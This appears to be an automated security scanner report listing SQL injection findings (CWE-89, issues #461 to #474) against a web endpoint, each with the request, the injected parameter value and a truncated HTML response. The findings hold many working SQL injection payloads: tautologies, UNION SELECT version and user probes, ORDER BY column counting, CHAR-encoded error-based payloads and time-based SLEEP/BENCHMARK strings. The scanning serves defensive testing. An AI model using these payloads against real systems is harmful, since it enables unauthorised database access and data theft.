href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #461\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioadmin\" or 1=1#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #462\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(\n1000000,MD5('A')),\n5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #463\nScan SQL InjectionSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io 1 AND (SELECT * FROM Users) = 1\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #464\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io 1)) or benchmark(10000000,MD5(1))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #465\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT @@VERSION,USER(),SLEEP(5),\nBENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,\nNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,\nNULL,NULL,NULL,NULL,NULL,NULL,NULL--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #466\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #467\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessaryhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #468\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io' or ''-'\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #469\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 28#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #470\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 29--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.ioCWE-ID CWE-89\nIssue Number #471\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+\nCHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+\nCHAR(116)+CHAR(69)))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #472\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+\nCHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+\nCHAR(116)))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #473\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioAnD SLEEP(5)\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.ioCWE-ID CWE-89\nIssue Number #474\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io (SELECT * FROM (SELECT(SLEEP(5)))ecMj)#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" 